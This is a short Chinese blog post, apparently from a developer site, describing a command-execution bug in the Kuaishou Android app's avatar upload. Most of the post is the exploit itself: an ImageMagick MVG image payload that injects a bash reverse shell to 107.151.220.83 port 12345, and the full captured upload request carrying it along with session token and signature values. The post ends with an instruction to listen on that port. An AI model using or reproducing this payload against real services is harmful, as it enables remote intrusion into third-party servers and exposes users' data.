Android动态命令执行漏洞,快手APP存在命令执行漏洞

app头像上传处

传一张图抓包

把图片的内容改为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'

pop graphic-context

imgpxy.php?url=gpj.72bb70d86ce590b03716a7de02ffeaa34abb2b31d95b20ea61099475da70035101069433112e5c0c0e5335ab38e3062eeaf759ba20cdd53b2a8032dc9ef13f7320610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

code 区域POST /rest/n/user/modify?lat=20.043384&lon=110.410347&ver=4.44&ud=234221710&sys=ANDROID_4.2.2&c=360APP&oc=360APP&net=WIFI&did=ANDROID_1072044643045168&mod=samsung%28GT-P5210%29&app=0&language=zh-cn&country_code=CN&appver=4.44.0.1323 HTTP/1.1

Accept-Language: zh-cn

User-Agent: kwai-android

Content-Type: multipart/form-data; boundary=8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Host: 180.186.38.200

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 1159

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="token"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

9818721fb5db40cc9d5015e8d5d0f8d0-234221710

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="os"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

android

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="sig"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

9357092294a29fb6be75ec7884fb44d6

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="client_key"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

3c2cd3f3

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="file"; filename="avatar-1462541373042.png"

Content-Type: image/png; charset=UTF-8

Content-Transfer-Encoding: binary

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'

pop graphic-context

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK--

发包后在服务器上监听12345端口

imgpxy.php?url=gpj.f27f74efd56c85d6f7f17dd6d0a41d58a43d59f8fa70bee8ba76cd65951c3cfe8b2fae9a476eee1b421d23e14aef1dffeaf759ba20cdd53b2a8032dc9ef13f7320610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

imgpxy.php?url=gpj.027f247f0c3882e4220c8a05a8eb68fbf594f9edae173798c9b29606fa0f967a1d5186b4bc437aa34c20bd258c8ee6deeaf759ba20cdd53b2a8032dc9ef13f7320610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值